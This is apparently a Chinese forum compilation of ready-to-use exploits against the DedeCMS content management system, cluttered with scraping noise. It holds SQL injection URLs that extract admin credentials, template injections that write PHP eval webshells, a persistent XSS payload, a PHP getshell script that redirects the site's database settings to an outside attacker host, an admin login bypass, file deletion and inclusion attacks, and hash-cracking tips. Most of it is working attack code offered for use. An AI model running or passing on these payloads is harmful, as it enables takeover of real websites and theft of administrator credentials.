|
|
}# C; g6 X+ ^$ T$ L- y- p; [0 b
Dedecms 5.6 rss注入漏洞
/ n7 Z' P i6 u+ O: ^. Ihttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
+ u8 P0 u# w. S% z) j; k8 p% s1 F* E, ~* o. K8 l1 _* x) Z8 @- V
: `6 d/ l% z, w. @4 S( n$ z
9 n( q5 r6 I& A; o# a6 C; q5 ^+ `' M3 \* R% e
3 @3 F" @' K4 \' I& K: l# F; U+ f
! U5 l# c. ?$ x: J
5 q, \- O2 [. G, [
2 |8 S. c( J/ K; ?DedeCms v5.6 嵌入恶意代码执行漏洞/ C% U' L# p o* c5 i
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
+ `* y' N3 t; K$ p发表后查看或修改即可执行
0 j& ^ Y' b4 B- z5 xa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}$ N8 T- D0 b5 P: \( B
生成x.php 密码xiao,直接生成一句话。% O& {* p/ F" O
6 k& r G* A: g1 J6 o) r( _( J! f- h, w. b
; X* ]5 U a1 O/ `- k6 D3 b
5 D6 i# |9 R7 [& [+ \
8 J L& L0 v3 j5 O& ?. c2 r
! L4 Q) q& U& x5 G/ c, d0 r# r( N2 X! m7 u, t
8 S: o4 k z: eDede 5.6 GBK SQL注入漏洞2 w& e+ s% [" p0 |% l0 W
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
; B- n% Z" E# W( L/ I# phttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe/ e# G$ s0 v6 y$ A3 v; e
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A75 }* O5 X3 P0 c# r$ b) ?# u% G
# M/ W+ O" `( U- I+ ]: ?" L( s% p/ i+ F1 B& l/ ]" p
2 w' Y% A9 g+ ^+ k% N" f
3 E$ Y& K6 k1 V
/ i8 O5 |4 r6 n7 o( ~8 e4 H$ z& o9 X" t- k' F: d
% k& ^4 C% _$ f
^2 M* L- r% n6 o1 a" [DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
7 L! Y' {. v# ?http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
, V& @: X K. g
" T+ J2 ^1 Z- }! ]% R; _7 m7 C; [- T7 H3 c* z
/ d. K7 G) ?) j) O" L& {& K3 f
* T% P- D( d( Q* Z3 ~4 b' G& ?- u+ f& J( H* B( m
4 w9 \+ d, ~: l! V |
DEDECMS 全版本 gotopage变量XSS漏洞) ]: u! z: m0 }$ x# Z. W# S+ T
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 ( O: H9 @: d0 x2 z5 N1 ^
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
7 U4 S1 l( N& ]! i; W6 V4 x
6 K' D; L( p; b$ F2 H; P6 x7 s: p$ B% P' {
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
$ j# T" T. d8 ohttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
( t7 j# C, a& ]" ]- v& w7 H n
$ k' P7 d5 T# j5 b% Q2 A$ }$ \$ n2 }1 k3 y$ f9 |
http://v57.demo.dedecms.com/dede/login.php
: h8 K+ B3 z9 M2 n* v6 `; S4 `& t! w
/ d: V, F1 P6 c& d2 n7 F$ s4 J
9 O% Y" } H# O5 ? t* S4 m% [& fcolor=Red]DeDeCMS(织梦)变量覆盖getshell
, n7 T+ g! A7 l* q#!usr/bin/php -w" N5 p) _+ R# w1 S
<?php4 {4 b- |0 A r- S& o/ W" T( o
error_reporting(E_ERROR);
. t6 o( r# L/ ]% {. P, x0 cset_time_limit(0);
* P* X% }! P3 l- R8 wprint_r('7 n) D# C& S! v3 Y
DEDEcms Variable Coverage( ^3 \3 Y8 C _1 q
Exploit Author: www.heixiaozi.comwww.webvul.com
K) g) G! \7 x) i);
. C9 Y- K7 X" Z p1 g1 {! b9 }echo "\r\n";
+ E# Y/ N8 i. H+ q3 F5 J. lif($argv[2]==null){
# | x) c$ z% F. s0 Oprint_r('8 F! o, {/ x! x( m
+---------------------------------------------------------------------------+$ R* |& s5 F) k0 m* v
Usage: php '.$argv[0].' url aid path; e5 z3 g( ]1 A( w8 p
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
7 z5 x/ h2 t {' v4 XExample:) i4 |7 n; V$ M
php '.$argv[0].' www.site.com 1 old+ L6 m" Y' h/ q1 U5 K: [
+---------------------------------------------------------------------------+! Y( d/ m( A. g5 k
');
6 Z. A3 l, x9 n6 fexit;
+ m$ }8 l% U8 A# A( p}
! |+ c" x! t6 F }9 d& n6 a' l$url=$argv[1];
1 l6 }" B% Y% N; z2 D$aid=$argv[2];
- J: Z. z' I. }% o3 ^" m1 n! d3 B" X$path=$argv[3];
3 m7 W( {$ a" g7 I9 i$exp=Getshell($url,$aid,$path);
$ `& D* `6 {: k2 Pif (strpos($exp,"OK")>12){# n) Z. A# L4 m; T; I: {
echo "8 @0 U; X: |( x# B [" f
Exploit Success \n";
, a7 K" K& P1 V3 }) m3 nif($aid==1)echo "
9 ^. K$ j U) lShell:".$url."/$path/data/cache/fuck.php\n" ;. F+ f1 N% }0 e6 [1 r* V
5 W V7 b0 c9 B9 ~2 F. K6 C
+ d3 R$ s' e2 i* C4 Z
if($aid==2)echo "' J# c+ W# J) T4 F. l% @: M
Shell:".$url."/$path/fuck.php\n" ;( K) V/ t2 Y" p6 G
7 _& S& y k! k3 b- y2 P
/ H7 k* L5 d9 ~( m) E- s+ `( _if($aid==3)echo "
' ^. O K# h" DShell:".$url."/$path/plus/fuck.php\n";
3 [; J% S2 c" B5 T- p8 u& M3 U* }
8 |9 j/ U9 R" R. G& s# q: h$ ?9 Y+ _2 G' |
}else{+ a" S3 F; z! |6 M0 U" d
echo "" O. ?: ~1 \ Y, A2 Z; R
Exploit Failed \n";
2 a; N2 n3 I% T4 ]}+ s7 e$ l3 j+ ]9 G, N# y. X! m
function Getshell($url,$aid,$path){
* f* k: @3 T- m* |+ d, w& k$id=$aid;! l9 j J; ^8 T* S, ]
$host=$url;
! n# l. I$ z) J8 m$port="80";
8 t* d. x( K S& O+ r$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
X! U# t! Q. W7 G3 j7 p. b; n$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
% p% j1 P( v3 r G9 J* D7 c$data .= "Host: ".$host."\r\n";
1 a2 X- @: o0 ~& M$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";" D1 e% U$ K/ f: K/ s; X: ^6 P
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
* _9 H3 s( S) M* c1 o$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";. c ]7 q- d6 T* s- [
//$data .= "Accept-Encoding: gzip,deflate\r\n";) Z) X& D2 u( ?+ F7 D
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
8 X, H8 n0 C- b2 `% E |' C$data .= "Connection: keep-alive\r\n";
# j$ ?- e- n$ {$data .= "Content-Type: application/x-www-form-urlencoded\r\n";2 c; q* ?2 z' w
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";9 R2 x. f# U/ ^/ N6 v" _% k( A( t/ [
$data .= $content."\r\n";
/ z4 f$ u" ]1 T3 y) N$ock=fsockopen($host,$port);) S9 J3 v1 ^6 y/ [8 s! i, B& Y/ K
if (!$ock) {: ~" d7 t/ n, w$ Z% \
echo "$ G9 b: P a' H m+ j: Z* o' K
No response from ".$host."\n";
& M" R3 _( Z! h$ h" W1 s4 {}9 h: P, ~9 U7 O3 J
fwrite($ock,$data);; s+ }. D+ W9 D g% p
while (!feof($ock)) {4 S+ Y) l9 H" S) b
$exp=fgets($ock, 1024);
& m9 o+ f+ d/ l- T9 x+ v# wreturn $exp;
4 i" D/ b4 H' `# n- |( A, g( l}
y3 o6 B9 a. h3 @}" g; _! u; N6 B' U
& D- M# y+ {3 c0 a% `! I `8 c1 [ p: V5 O' X
?>, G$ L J; K3 Q/ D+ Q6 r
! M9 @0 ]* k* x4 x; ?
# s- y4 ]6 T1 \. t! t/ K& A5 }; r: @$ Y) G+ C1 Q
; b3 \% [1 j! \; m8 q2 |* ^# G1 c: i9 h8 ^1 l* f
7 O/ P4 n$ ~6 w0 Y: O! F9 z4 b$ T& z; @4 p6 M! U$ t5 D
$ Q' l/ K& U+ D3 E2 H9 g- `
' a( S8 e. [' @) Y7 E g F, Z! R9 e
$ Z' r3 }* c6 G IDedeCms v5.6-5.7 越权访问漏洞(直接进入后台). Q+ Q! e: G8 G! \; E
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
) J5 q. ]$ |$ @6 b0 f( }2 m- i! m6 T: O6 _ ]6 s# D; u7 d
1 j I+ l8 c! ^" x
把上面validate=dcug改为当前的验证码,即可直接进入网站后台' ?+ a9 }" y+ h% J) Q! p
% \! O' W; `8 a- N0 l7 z/ t
, L1 X- B/ M; D9 @+ g# q此漏洞的前提是必须得到后台路径才能实现# x/ Y8 N' D. Y* h: y' G; a
: l( w% Z( D1 G6 ^: b+ F$ }; M8 P. Y7 C X( Y! i, T( _, E: ?
: Y2 u: M6 s) E3 k& ?& [
5 C+ B8 e+ a6 }' j* U! W# e7 G9 _' ^5 `: d
9 ]( W( ~4 ? u1 g8 N" F
3 p( F+ d# f8 t6 C- c, p& Y
" I U! u4 u( s+ ?9 B* }2 P
# V+ S/ c0 i9 ]1 ^- _8 f3 L) H+ i
* B* [* i- H, O) A; P- {Dedecms织梦 标签远程文件写入漏洞
2 X9 g' K6 }! g+ t1 m前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');# S- ]9 c- v6 D! C1 m6 R
3 i7 f5 f% E) k# B0 V7 t/ K
7 E* m9 l: e. X3 _* {3 f" K: \) i再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
; i( X$ g: Z" W<form action="" method="post" name="QuickSearch" id="QuickSearch">0 K; P% {+ U$ {+ {" Z: R {
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />- P0 O7 X- b3 N% W, A
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
" S: Y9 M) X/ Z5 \, r5 q<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />( R0 _0 w. V$ S
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
4 N* e7 o$ k" {' x<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />2 `/ O" K2 C9 P2 ` _/ ?
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />. v- n! ~* n S8 W
<input type="text" value="true" name="nocache" style="width:400">
, c0 R# _2 e. Z- P( G" b7 @<input type="submit" value="提交" name="QuickSearchBtn"><br />- n4 O- g: k" a. l: i
</form>
# |! `# F4 {! c; Z( p' ^+ |<script>
* `* d( r" |! Z7 j$ I1 N. O+ P8 Vfunction addaction()
' H, g) J( R! C! \; t p5 Q{! \* C! l9 r( T! }% O6 s
document.QuickSearch.action=document.QuickSearch.doaction.value;
2 H' N) V4 g' G( x/ F A% U& @' J+ b/ C}
- o% v' e o* ?9 J w</script>
# [- }; z, J$ j) U8 |
0 E# A& L. J% n5 a
+ U l8 L0 {+ P5 m: L
6 Y0 ^" K7 O6 z5 V& C
1 G! ^2 E5 L8 N& S1 G' q" t+ o, i( L( |0 s3 j
0 C9 d% U/ r9 K# h& X$ L0 s- {7 k$ z# b
8 r* ~) T" y; w) v1 W; A, X; e+ {6 {; @9 M$ F9 l# W4 `7 A& g) p" K
3 y9 W" y( h. \2 WDedeCms v5.6 嵌入恶意代码执行漏洞
8 W9 @0 m2 N5 c( S: v注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行0 w z4 @* Y; L$ h) Y
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
- e/ U9 N1 o2 O4 r& H' \: w5 V1 E, d生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得' f! b- i% D5 ^; Y& L; y' _8 O
Dedecms <= V5.6 Final模板执行漏洞
( p/ c; k, x/ }) ]; ?注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:0 ?0 b i3 g5 j' o. V$ M* m
uploads/userup/2/12OMX04-15A.jpg) _) |/ T. Y0 k& S4 x1 c+ V. W
" p( j! F! m. L( Y; H8 u/ A6 m
' O: C2 H% N, D3 v: U+ O模板内容是(如果限制图片格式,加gif89a):% P8 i2 A6 y7 @# F. h
{dede:name runphp='yes'}
- s8 V4 v. i: ?. Z/ u$fp = @fopen("1.php", 'a');
& M7 e% t, s8 Y" P9 q" A@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");0 ?# s! q: u3 Q+ m. H- N, R
@fclose($fp);+ H2 ^" C V! G }1 N; a7 ^2 `
{/dede:name}$ u, D$ l: P. S
2 修改刚刚发表的文章,查看源文件,构造一个表单:
5 B) H f0 N* v; g# A<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">' w, I# a5 x% M: z
<input type="hidden" name="dopost" value="save" />! ], r7 t. }' I- Q3 p$ J
<input type="hidden" name="aid" value="2" />
) T3 @5 Q. x/ o2 F) n# Z<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
! t+ {5 r$ d1 @: e7 T<input type="hidden" name="channelid" value="1" />4 i, b2 `( G1 J2 Q8 w& V+ `5 p
<input type="hidden" name="oldlitpic" value="" />
+ B% D- w9 `$ z8 L# T+ _* A' |<input type="hidden" name="sortrank" value="1275972263" />4 s* F: }4 R/ y) R5 w: c- N
2 w) k$ `( n7 p: I9 n
( b' ~+ q0 @& ]! C6 X6 [<div id="mainCp">* y8 C4 U+ p- g: z
<h3 class="meTitle"><strong>修改文章</strong></h3>; Z. c v$ D$ }" n: y: s5 n( }
$ \# b1 G8 p% b& A3 b, e, @8 l
3 Q: ^; @6 h0 E& K! R% R' O, y7 B<div class="postForm">
8 R0 r/ o( N8 p. v3 u& l8 e<label>标题:</label>
0 v/ e* y; o8 _7 T9 B1 j; |# I4 ~. n- x( x<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>- I; D7 N# s$ b: m& f6 E9 L8 k3 n' C
) z- [& u+ s Q6 ?) Z. c/ V( V9 S
. A7 B2 Y( P; b J9 ^% c+ q* g7 p<label>标签TAG:</label>
( h- X) W$ u4 W<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)( H3 M$ r" \$ e$ Z8 A* N. R9 o
, o; r% c `1 Q6 t' L
! v+ V3 |) G" u5 ] u8 u' e, q<label>作者:</label>$ I! D$ B% G* ?3 K
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>/ l7 H4 Z0 {% { n' q
# M; D4 Z; ^. Q, F1 r
8 O/ Z/ z! d( Y+ A
<label>隶属栏目:</label>" f9 ?5 X) t9 H2 \
<select name='typeid' size='1'>2 X4 s! ^# U# T% t/ `) R
<option value='1' class='option3' selected=''>测试栏目</option>/ @4 N3 s. z \" G) m1 {8 w
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
+ h B; |! K9 Z" r; X+ X% e j' O1 F' V; d3 E. p: @' f! z7 f$ v
8 ^/ h: C; F' J4 w$ D, ?
<label>我的分类:</label>4 _% ^# S% O* |5 Q2 U
<select name='mtypesid' size='1'>" v, _% G+ w3 z2 d5 r% Q
<option value='0' selected>请选择分类...</option>+ ~0 U5 Y9 Z1 F- b0 Z
<option value='1' class='option3' selected>hahahha</option>
5 T, B8 V( Y/ `, g- U</select>4 W: e$ x" Y( ~+ d! ]
~; [5 h/ p" M2 E" B
# P3 \& T: o) S6 t<label>信息摘要:</label>
' c3 i b; l9 T3 }3 u9 g0 r<textarea name="description" id="description">1111111</textarea>
2 p! |' }5 O) r9 ](内容的简要说明)
; q( K1 k! |& P: l; ~' _: a! M+ w
, K7 f0 b2 \6 T3 ^+ z7 v1 c! [* n Q* j. T. D2 k
<label>缩略图:</label>
; s5 }( ?4 w$ E5 l<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
& H' ~+ X0 S6 X3 H( W, {( Y& b0 Q) \+ @6 d) f% G
* C: i) J' F9 \% B0 @
<input type='text' name='templet'
9 x, f! v6 {8 b* ivalue="../ uploads/userup/2/12OMX04-15A.jpg">
9 N& Q: g" F# Z( s. a<input type='text' name='dede_addonfields'! o" \( N& U ` A) ^5 ~ w
value="templet,htmltext;">(这里构造)
% n6 l3 U3 f( ?8 Y1 A" D) l</div>' m1 T6 {+ s4 ]* g. Z0 W3 T
$ s7 D$ ]: h# ]" D8 U6 _8 y Q% p; ^6 i8 i2 A/ u3 f5 }
<!-- 表单操作区域 -->4 @- K# T$ R% b5 l" `8 O/ j3 Q
<h3 class="meTitle">详细内容</h3>% R- U& q& C+ P5 A% ]
5 F" k! j. s8 M1 {; @
) r0 _$ m8 L% O! T& j6 K; Q4 N
<div class="contentShow postForm">1 ]; d( P# r' z' ~4 [
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
2 i, r& ~8 e& w5 T& B1 e" X' f! e6 e0 B) n. a8 }
8 K& l% Y+ s; H9 F& s<label>验证码:</label>
5 h. M. t: Q9 \; C<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />8 O/ h) i/ G8 h. C( L; [' M3 P
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
$ Q c& H& u9 ~. y) [' h9 w
5 C" v2 A$ R+ x. q
! V. t: g4 X$ ?; b) y<button class="button2" type="submit">提交</button>
7 Z% Y$ G' _+ X, i2 `( _; z<button class="button2 ml10" type="reset">重置</button>) E6 o2 }9 _- n7 @ ^* b
</div>" R l! M% C Y& t9 ^$ f# z/ M
' p, [0 F7 i! d- d5 L& L; x5 O0 r& S) N- a" x
</div>
& m5 f5 e& \$ a! @' _1 F, c& e1 C! X9 ~" m
, Y3 c: M. U/ D t4 ^</form>
; {. ~+ _; O; U: f- F% n0 J
, L# O" n3 r! a6 o6 m5 ]( g Y: l
5 c+ f$ @2 s8 b, |( a提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:" X% U7 U6 T' m) x
假设刚刚修改的文章的aid为2,则我们只需要访问:, y+ ^( y5 t$ h: q0 ?
http://127.0.0.1/dede/plus/view.php?aid=23 t H8 N, I/ {% X: x
即可以在plus目录下生成webshell:1.php
1 i7 p9 q" R+ [1 X" v
5 s4 T( R% j& @( m0 {: O7 {; V" V4 n& Y& o
- r4 P" {" K B2 {! j% I) R' S% E5 X
3 J/ ^) \* w4 \; s+ n& v2 T/ Y" W2 v: _2 h$ K X
( E* z8 f. k( ^1 g9 D
* l% L( }! ~( }, w& X" ~4 }4 E
$ x! ~/ Y X7 F1 r5 I8 \
5 Q7 ]4 D& B! S- @; q; a
* z! x) i& k0 f. ]. k" b" t" [+ \" a: [8 @9 k+ b
: ~& K) [# a' j6 I8 ?
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)4 a& Z0 @5 p2 q
Gif89a{dede:field name='toby57' runphp='yes'}$ n5 E1 r/ j7 ] H" ]2 r o
phpinfo();, b. Z% w4 ^7 N% \$ F. \
{/dede:field}* \2 M# Y d `7 f3 b6 x, e
保存为1.gif
/ }4 |: M/ ~' U( j$ A( @<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
. N G9 f% d( J+ G2 [8 p<input type="hidden" name="aid" value="7" /> 9 [1 n4 m' B/ z9 K6 q
<input type="hidden" name="mediatype" value="1" />
$ f' b, W# K: L+ u5 c<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> 5 r, H1 n8 w8 W0 w- ^4 D! c
<input type="hidden" name="dopost" value="save" />
" p& Y% Q. \1 q2 H# v6 v4 @% u4 W<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> ! e( @( G5 ~5 j' M& Z
<input name="addonfile" type="file" id="addonfile"/> ) K4 f' _6 U2 R0 q; _" ^% {
<button class="button2" type="submit" >更改</button>
- p0 J+ ^! x3 N3 ^" [6 O</form>
: @! T2 d, g- H' h
- S, Z; ~7 ?( s3 R! D7 D7 O( @* e1 y: V# }; L8 M
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
8 Q) K: W6 O. V8 S发表文章,然后构造修改表单如下:) a8 R" f/ t2 `- k. U A
" b# W. g; o- d# n* Q
# H" s ~( W5 ?1 Q: q# }<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 2 [; o/ |2 W3 e6 o1 o1 @8 m
<input type="hidden" name="dopost" value="save" /> 9 }7 o, x1 | X
<input type="hidden" name="aid" value="2" /> : H/ U( W \6 J- e; r
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
+ t) C- k3 b6 T, q( E<input type="hidden" name="channelid" value="1" /> % @/ g9 |$ a! } @ p- {5 r0 P
<input type="hidden" name="oldlitpic" value="" />
# v7 Q' u6 z/ Y ^% F1 c<input type="hidden" name="sortrank" value="1282049150" /> & ^7 `' K$ j( A Z+ P
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
! `5 p) M& S; Q% U" F. G8 S<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
3 Q, X- G3 e3 ?( x$ e<select name='typeid' size='1'> & d6 S1 {( R4 a+ f7 ?' E9 n1 D
<option value='1' class='option3' selected=''>Test</option> 3 ^ M- }$ M( ~5 S
<select name='mtypesid' size='1'>
1 B* a: B9 E- w: K' b2 v* }<option value='0' selected>请选择分类...</option> , B& m: K$ D! D& L* s6 W
<option value='1' class='option3' selected>aa</option></select>
' q5 y. N; C% [1 G% d- Q<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 8 T, Q" A) \6 ]2 r" q7 x0 P
<input type='hidden' name='dede_addonfields' value="templet">
/ I( a; s6 `1 ^; ]& B- ]( T<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
; y. e2 r4 F6 i<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
+ ~) W L; c7 R: H$ Z$ M<button class="button2" type="submit">提交</button>
$ j& V& U" z' u2 _</form>. R1 ^" L U4 V) G+ N f& n M
# G) @( v8 ?- C6 k7 h! ]
" W; y+ b9 w7 q6 Q
' ~/ [' P. V2 F3 e. a; u' K; X8 B! m) n& u9 A
) q0 \3 m# G" ^; O$ t) c2 v
9 |! h7 p) j6 E; z& @" p& R! q1 e4 w9 `3 G) Y7 [1 E" T4 i
8 A6 L( B& ]# y; W3 k
1 N" ^" C# ^0 n5 Z' `' i5 `& d
1 o: A, O% K! R) E- v i. E8 K" J- H
. E* r& B& L* G. u织梦(Dedecms)V5.6 远程文件删除漏洞
1 u- b' r- ~- F& |. T7 f7 O2 Xhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
1 ^# v- `, D7 z) _4 A* w0 j
# k' {" R) ~- B+ A5 L0 T. C5 b, ]
) U7 W) U( x# n. P* p/ q: b
9 V2 Q9 L/ ~. b% Q* r" t$ M
; q# U5 |! ~7 T1 {* ]" F
9 `) B+ D( v2 h' S; y# d0 Q. `: H% A2 i- z+ c; A
0 O# k* B9 A& b# [- I' B* O3 d' E6 X' L3 p2 x7 k* h8 ?5 ^
1 Q1 S3 R/ }5 H( J2 Y: J. W2 k
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
! S/ ^4 e7 p) U4 n6 Rhttp://www.test.com/plus/carbuya ... urn&code=../../
7 o6 O4 P! _+ q. a5 y
$ [# r$ p. z7 |! m- r1 E8 M* B7 |: ]2 p- N/ h2 k. L. V8 k4 w
% h0 J v p4 Z
! p' i+ S, d; i) ~& m
: y2 ]1 {9 ~/ i" ?0 U$ O1 \9 P* y9 I6 K
5 L4 p' }) b1 y# d7 ~- Q
! E7 c& R' T3 a( l0 d& W+ l' ]+ S9 g+ g, ^ k ]2 f' w8 y
7 a5 E k7 Z# e% @. N; Q) C* wDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
/ C" X/ G7 O3 Q- G a3 D' a* tplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`: q+ H9 k) |9 X* z
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD53 k: }9 |6 C, h: }/ [$ ?
* ~ v8 t `2 P, U! ^0 u' {) B ?5 _2 ^% j. w [9 a( E" l i2 m
. Y$ s" A: e( j4 m! `
' r* D* k( |' B5 K' Y. q
: O! o/ D s! c [2 C
/ A9 @" T( ^3 K6 {
% [- V4 H' w+ h& V1 n' S% w O5 A, f/ e9 h
! }+ F* Q, ]) l: k
5 v$ P: b. u# z a9 f0 q织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
" p! a& B7 R4 g! x: \3 xhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
4 C* x; U9 c) j9 S4 Q& x& _" l7 ^$ Z+ ~4 f9 J/ e$ E
1 z5 U9 [4 ~1 U2 w7 A# R! x0 `
9 i; m$ q3 l+ J2 A- N# h2 c& _
5 v+ s8 y& L9 L* i6 O
" A8 g s) y1 W& Z
: z Z9 I1 a7 ]* `5 ^6 k; H- Q& V0 d( X: K# a3 l r8 m" d
+ x, Y3 f4 }7 L! z' j% C2 k' h
+ k1 w c! q- g
